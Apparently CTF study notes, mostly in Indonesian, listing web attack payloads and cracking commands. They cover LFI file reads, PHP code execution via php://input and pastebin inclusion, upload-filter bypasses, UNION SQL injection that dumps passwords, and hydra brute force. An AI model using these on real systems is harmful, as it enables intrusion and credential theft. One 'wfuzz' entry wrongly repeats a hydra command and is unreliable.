CTF

Web Security
Reverse Engineering
Binary Exploitation
Cryprographi
Forensic
Steganography

Web Security

LFI & RCF

misal web dengan link

http://192.168.43.207/ipb/ipbScript/PHP-LFI/index.php?page=page3.php

...?page=page1.php

dapat diganti

...?page=/etc/passwd
...?page=/etc/passwd%00 (php kuno)
...?page=../../../../../../../../../etc/passwd
...?page=php://filter/convert.base64-encode/resource=index.php
...?page=php://filter/convert.base64-encode/resource=index
...?page=http://localhost/(file .txt)?

use terminal

curl -X "POST" -d "<?php echo shell_exec('cat /etc/passwd')?>" "http://192.168.43.207/ipb/ipbScript/PHP-LFI/index.php?page=php://input"

use pastebin.com

new paste

masukkan code

<pre>
<?php
    echo "Tes RCE";
    echo shell_exec("ls -la");
?>
</pre>

Paste expiration : 1 jam aja
Create New Paste
raw
ambil link raw

...?page=http://pastebin.com/raw/(link)

File Upload

membuat file tes.php

<pre>
<?php
    echo shell_exec("ls -la /");
?>
</pre>

menggunakan burp suit

edit type file
rename file ->
    .php, .php3, .php4, .php5, .php7, .pht, .phtml

SQL Injection

y'-- 
y' OR 1=1 '--

misal url

192.168.43.207/ipb/ipbScript/blog/post.php?id=1

diganti

...id=999999999 UNION SELECT 1,2,3,..., (sampai pas)

cari nama data base :

...id=999999999 UNION SELECT 1,database(),3,user()

cari nama tabel :

...id=999999999 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()

cari kolom tabel :

...id=999999999 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_schema = database() AND table_name = 'user'

...id=999999999 UNION SELECT 1,username,3,password FROM user
...id=999999999 UNION SELECT 1,username,3,password FROM user LIMIT 0/1/2,1 (baris/kolom ke ...)
...id=999999999 UNION SELECT 1,group_concat(username),3,group_concat(password) FROM user

noxtal.com

Cracking

ZIP

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

Hashes

Using hashcat:

hashcat -m $MODE hashes /usr/share/wordlists/rockyou.txt

Bruteforce SSH

Using hydra:

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh

Steganography

Crack steghide passphrase using stegracker: Install:

pip3 install stegcracker

Run:

python3 -m stegcracker tocrack.jpg

Web Directory and Query Parameters Bruteforce

Using gobuster:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.log -t 200 -u $URL

Using wfuzz:

wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/FUZZ

Using wfuzz to bruteforce query parameters:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/?parameter=FUZZ

Recursive directory scan with wfuzz:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 200 --hc 404 -R $DEPTH http://www.host.name/FUZZ

HTTP Form Bruteforce

Using Hydra:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

Using wfuzz:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

Wordpress

WPScan + password bruteforce:

wpscan --url $URL --passwords /usr/share/wordlists/rockyou.txt --usernames usernames.txt

Subdomain Bruteforce

Using wfuzz:

wfuzz -c -f wfuzz-sub.log -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u $URL -H "Host: FUZZ.host.name" -t 32 --hc 200 --hw 356

Note: you will need to adjust the --hc and --hw parameters to your needs. Check wfuzz -h for more information about those.

Using gobuster:

gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL -t 32

Wetofu